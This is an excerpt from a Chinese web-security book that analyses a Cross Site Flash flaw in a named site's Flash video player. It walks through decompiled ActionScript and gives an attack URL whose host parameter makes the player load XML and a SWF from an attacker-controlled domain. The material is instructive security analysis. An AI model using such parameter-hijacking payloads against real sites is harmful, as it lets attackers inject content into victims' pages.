XSF即Cross Site Flash。
很多网站的Flash播放器都会有XSF风险,因为这些播放器需要能够灵活加载第三方Flash资源进行播放。不过这样的XSF风险其实非常小,因为浏览器直接访问Flash文件时,安全沙箱的限制是很严格的。所以,下面分析的nxtv flash player只需了解思路即可,这样的XSF漏洞在这样的场景下毫无价值,有价值的是思路。
漏洞文件:http://video.nxtv.cn/flashapp/player.swf
分析方法分为静态分析和动态分析。
1.静态分析
我们可以使用SWFScan图形化界面或者用swfdump命令行工具进行反编译得到ActionScript代码,这两个工具都很不错,下面以SWFScan为例进行说明。
如图6-5所示为SWFScan界面截图,在Properties栏中可以看到这是用AS2编写的Flash。AS2有全局变量覆盖风险,这个SWFScan对我们来说,最大的价值就是Source栏的源码,其他功能一般不用,用肉眼扫过源码,在反编译出来的源码中发现下面一段代码。
图6-5 SWFScan界面截图
var myXML = new XML();
var __callResult_162 = myXML.load(( ( "http://" + _root.host ) + "/load.php?action=playerad" ));
myXML.ignoreWhite = True;
myXML.onLoad = function (success) {
type = myXML.childNodes.0.childNodes.0.childNodes.0.nodeValue;
adurl = myXML.childNodes.0.childNodes.1.childNodes.0.nodeValue;
_global.sec = Number(myXML.childNodes.0.childNodes.2.childNodes.0. nodeValue) ;
std = myXML.childNodes.0.childNodes.3.childNodes.0.nodeValue;
if ( ( std == 1 ) ) {
if ( ( type == 1 ) ) {
mp1.contentPath = ( ( ( "http://" + _root.host ) + "/" ) + adurl );
var __callResult_267 = mp1.play();
首先加载远程XML文件,这个功能是AS经常使用的,因为该功能非常方便,使用简单,且XML可配置性很高。后面的很多功能都会用到XML文件里的相关数据,如果能劫持这个XML,就能劫持之后的很多操作。
这里加载远程XML文件是可劫持的:_root.host,这样的全局变量可以直接通过URL方式提交,如:
http://video.nxtv.cn/flashapp/player.swf?host=evilcos.me
此时远程XML文件为:
http://evilcos.me/load.php?action=playerad
内容如图6-6所示。
图6-6 远程XML内容
这样的XML结构和原始的是一致的,只是我们把内容替换为自己恶意构造的,之后mp1.play();的contentPath值( ( ( "http://" + _root.host ) + "/" ) + adurl );变为:
http://evilcos.me/flash/video.swf
这样就加载了第三方Flash进行播放,从而造成XSF攻击。
其实,完全静态地用肉眼分析是不太容易的,很多时候我们还会结合动态方式进行分析,比如在Firefox下Firebug的网络请求中发现一些额外的请求,更能清晰地理解目标Flash的运行流畅。
2.动态分析
Firebug网络数据如图6-7所示。
图6-7 Firebug网络数据
注意,加载第三方资源时需要第三方域的根目录下有crossdomain.xml文件,并且授权这样的跨域请求。顺便说一下,如果是直接加载第三方Flash文件,则不需要crossdomain.xml的授权。
本文节选自《web前端黑客技术揭秘》
钟晨鸣,徐少培编著
电子工业出版社出版